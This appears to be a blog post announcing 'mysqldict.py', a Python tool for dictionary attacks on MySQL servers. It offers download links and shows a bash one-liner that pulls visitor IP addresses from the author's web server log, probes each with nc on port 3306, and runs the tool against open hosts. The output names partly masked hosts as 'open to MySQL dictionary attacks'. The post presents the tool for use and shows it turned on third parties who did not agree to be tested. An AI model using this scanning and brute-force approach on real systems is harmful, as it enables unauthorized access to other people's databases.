After taking a few months to dilly about with python and learn the ins and outs of it to a certain extent, I decided to write a program that does dictionary attacks on mysql.<\/p>\n
Plain text: Tar archive: The beauty of this program, is that it actually does a test on the remote host and tells you whether or not that the remote host allows remote MySql authentication.<\/p>\n Here’s a quick peek of mysqldict.py in action used inside of a bash shell script (IP addresses hidden of course):<\/p>\n If you’re wondering what the command ‘httplast’ is, let me explain. I’m too lazy to type out: cat \/var\/log\/apache2\/access.log<\/strong> , so I created an alias <\/strong>to do handle this for me.<\/p>\n The tool itself, I feel is pretty self\u00a0explanatory, but if you have any questions feel free to leave a comment or shoot me an e-mail.<\/p>\n","protected":false},"excerpt":{"rendered":" After taking a few months to dilly about with python and learn the ins and outs of it to a certain extent, I decided to write a program that does dictionary attacks on mysql. Plain text: http:\/\/zitstif.no-ip.org\/mysqldict.txt Tar archive: http:\/\/zitstif.no-ip.org\/mysqldict.tar MD5Sum: f0e07ca29cc783c6c27f3829f579d37e The beauty of this program, is that it actually does a test on … Continue reading mysqldict.py<\/span>
\nhttp:\/\/zitstif.no-ip.org\/mysqldict.txt<\/a><\/p>\n
\nhttp:\/\/zitstif.no-ip.org\/mysqldict.tar<\/a>
\nMD5Sum: f0e07ca29cc783c6c27f3829f579d37e<\/p>\n:~\/for i in $(httplast | egrep -v \"${WANIP}|127.0.0.1|192.168.\" | awk '{print $1}' | sort | uniq); do nc -z -w1 ${i} 3306; if [[ \"$?\" == \"0\" ]]; then .\/mysqldict.py -t ${i}; fi; done\r\nmysqldict.py:\r\nPort 3306 on 115.##.##.#1 appears to be open..\r\nA connection has been made and here are the results of the test:\r\nThis host does not allow remote administration on MySQL\r\nmysqldict.py:\r\nPort 3306 on 62.##.##.#1 appears to be open..\r\nA connection has been made and here are the results of the test:\r\nThis host is open to MySQL dictionary attacks!\r\nmysqldict.py:\r\nPort 3306 on 66.##.##.#1 appears to be open..\r\nA connection has been made and here are the results of the test:\r\nThis host is open to MySQL dictionary attacks!<\/pre>\n